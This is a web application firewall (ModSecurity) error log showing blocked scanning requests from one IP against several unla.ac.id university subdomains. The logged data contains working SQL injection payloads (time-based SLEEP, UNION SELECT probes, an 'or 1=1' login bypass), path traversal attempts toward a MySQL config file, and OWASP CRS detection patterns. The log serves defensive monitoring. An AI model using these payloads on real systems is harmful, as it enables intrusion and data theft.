[Tue Aug 29 11:34:49.321020 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAAUdm3kAAABS"]
[Tue Aug 29 11:34:49.324143 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAATUxQ0AAAAW"]
[Tue Aug 29 11:34:49.325714 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAARjjWsAAAAL"]
[Tue Aug 29 11:34:49.326762 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAATfd3gAAAAk"]
[Tue Aug 29 11:34:49.327778 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAATZp6IAAAAf"]
[Tue Aug 29 11:34:49.329672 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAAUJIyIAAABB"]
[Tue Aug 29 11:34:49.333775 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAATavugAAAAg"]
[Tue Aug 29 11:34:49.334009 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAATmZdcAAAAr"]
[Tue Aug 29 11:34:49.334426 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAAPLwJgAAAAX"]
[Tue Aug 29 11:34:49.340749 2023] [:error] [pid 1240] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAATYeEcAAAAd"]
[Tue Aug 29 11:34:49.343945 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAAUIz7kAAABA"]
[Tue Aug 29 11:34:49.344084 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAAUR830AAABI"]
[Tue Aug 29 11:34:49.345412 2023] [:error] [pid 1256] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAATovnQAAAAt"]
[Tue Aug 29 11:34:50.308204 2023] [:error] [pid 1282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11asCo-f0AAAUCJdgAAAA6"]
[Tue Aug 29 11:34:50.316294 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11asCo-f0AAASI0EMAAAAG"]
[Tue Aug 29 11:34:50.317099 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11asCo-f0AAAPLwJkAAAAX"]
[Tue Aug 29 11:34:50.318215 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11asCo-f0AAARdiScAAAAK"]
[Tue Aug 29 11:34:51.568327 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAAUJIyUAAABB"]
[Tue Aug 29 11:34:51.575970 2023] [:error] [pid 1292] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAAUMVNQAAABE"]
[Tue Aug 29 11:34:51.577135 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAASOUpEAAAAR"]
[Tue Aug 29 11:34:51.577470 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAAUDQTAAAAA7"]
[Tue Aug 29 11:34:51.582241 2023] [:error] [pid 1237] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAATVtSUAAAAZ"]
[Tue Aug 29 11:34:51.612725 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAATZp6UAAAAf"]
[Tue Aug 29 11:34:51.938073 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11a8Co-f0AAAUZcFYAAABO"]
[Tue Aug 29 11:34:51.939237 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11a8Co-f0AAATlLEwAAAAq"]
[Tue Aug 29 11:34:51.941479 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11a8Co-f0AAAUXLjAAAABM"]
[Tue Aug 29 11:34:51.943713 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11a8Co-f0AAAUdm34AAABS"]
[Tue Aug 29 11:34:51.944287 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11a8Co-f0AAAUTiXoAAABJ"]
[Tue Aug 29 11:34:52.303664 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11bMCo-f0AAATWYRYAAAAa"]
[Tue Aug 29 11:34:52.318962 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAATPtR4AAAAM"]
[Tue Aug 29 11:34:52.319426 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAAUFdfIAAAA9"]
